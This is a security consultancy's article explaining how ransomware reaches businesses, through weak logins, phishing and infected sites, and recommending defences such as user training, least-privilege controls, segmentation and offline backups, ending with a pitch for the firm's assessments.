Cyber criminals are targeting more businesses than ever before with ransomware, a type of malware that renders systems encrypted and unusable until the victim pays a ransom (often in Bitcoin or another cryptocurrency). Not only does this hack debilitate daily operations until the ransom is paid, but it also creates a significant financial burden for the organization. And while some companies may believe they are safe, that isn’t necessarily true.
Many businesses operate under the impression that they aren’t targets for cyber criminals because they don’t store personally identifiable information (PII) or protected health information (ePHI) on their networks. But attackers can bring any organization’s operations to a halt with ransomware — regardless of the type of their industry or the data they maintain. And this makes anyone who relies on computers for their day to day business operations a target.
Financial implications of ransomware
Ransomware hit the public domain when Cryptolocker, a notorious piece of malware, was unleashed in 2013. New and more sophisticated variants, such as Bad Rabbit, WannaCry, Petya, and Ryuk have since emerged along with higher ransom demands. Since 2015, over 215 different variants have been discovered — only 97 of which have known remediation tools. Ryuk is particularly impactful since it can infect an entire enterprise network, thus creating a true business interruption event. In fact, officials in Jackson County, Georgia were recently forced to pay $400,000 in ransom due to a Ryuk infestation.
How does a company become infected by ransomware?
There are many methods through which ransomware can enter the network. Some of the more common methods include:
- Poor authentication practices. Many organizations have internet-accessible login prompts. If these login portals aren’t secured by strong authentication practices, including lengthy, complex password requirements and multifactor authentication, then attackers could simply guess login credentials.
- Email phishing messages. If a user opens an infected attachment or downloads malware from an infected website, they put their company at risk of an attack.
- Infected web pages. An infected website could download and execute malware on a user’s PC.
- A mobile device. If an employee uses a mobile device running an MS operating system outside their organization’s firewall without a personal firewall or a critical patch, they risk infecting the internal network once they reconnect the device.
- Weak passwords. Employees using servers in a demilitarized zone (DMZ) that is exposed to the internet could put the network at risk by using weak passwords that an attacker could guess or compromise.
Once an attacker gains access to an externally facing service such as remote desktop protocol (RDP), Outlook Web Access (OWA), Citrix Gateway, a VPN, or some other remote access service, they can attempt to increase their network privileges to the highest level.
Limit the likelihood of a ransomware attack
For in-depth technical information about how to minimize and mitigate exposure to ransomware, consider the resources offered by SANS Internet Storm Center and the U.S. Computer Emergency Readiness Team. Additionally, there are several key strategies your organization can use to prevent or limit the impact of ransomware.
Raise phishing awareness
Malware typically needs a helper to do its job, which means an employee must open an infected attachment or visit an infected site to make a phishing attack successful. Educate users on phishing scenarios and consider internal phishing tests to gauge employee readiness. Tests should familiarize employees with common phishing scenarios as well as teach them how to identify masked links and spoofed sender addresses.
Add strong user controls
You can help mitigate risk by limiting user permissions to only the programs and systems they need to fulfill their job, including:
- Limit local administrator rights to PCs, workstations, and laptops.
- Those logged in with administrator level credentials should avoid using email, browsing the internet, and any other general computer use.
- Network and domain administrators should be required to have two sets of credentials — general use and elevated privileges.
- Implement a policy and practice that stipulates administrators should not log into workstations with domain administrator rights.
Add software controls to minimize user access
One way you can prevent employees from clicking on a malware file is with the help of software controls that limit the number of applications and files a user can run. Consider programs like AppLocker and EMET to help restrict execution and spread of malware. Attackers have their favorite methods of delivering malware into organizations, often by abusing certain Windows binary files. Knowing whether or not these files are utilized in your environment will allow you to block them outright or increase logging and alerting around those files.
Ransomware often spreads to whatever devices it can communicate with and control by exploiting unpatched vulnerabilities or compromised user accounts. Proper network segmentation will help limit the internal attack surface by preventing communication between certain device types. Restricting communication between devices on your network to allow only what is necessary will greatly reduce the potential impact of a ransomware attack.
Validate the integrity of your backup and restoration capabilities
Attackers can cause additional damage during an attack by deleting or encrypting online backups. Consider implementing backup and restoration procedures that will guard your company against data loss.
- Be sure you have off-line copies of backup and restore files
- All electronic backup and restore files should be saved in a well-secured location
- Perform a thorough review of file permissions for network file shares, and pay special attention to locations storing electronic backup and restore files
- Practice a full system and data restore to verify confidence in your capabilities
How we can help
As part of an overall cybersecurity assessment, our professionals can run a vulnerability scan to identify the holes in your organization’s security. Even more, we can perform a ransomware preparedness assessment to measure your company’s ability to defend against and mitigate the impact of a ransomware infection.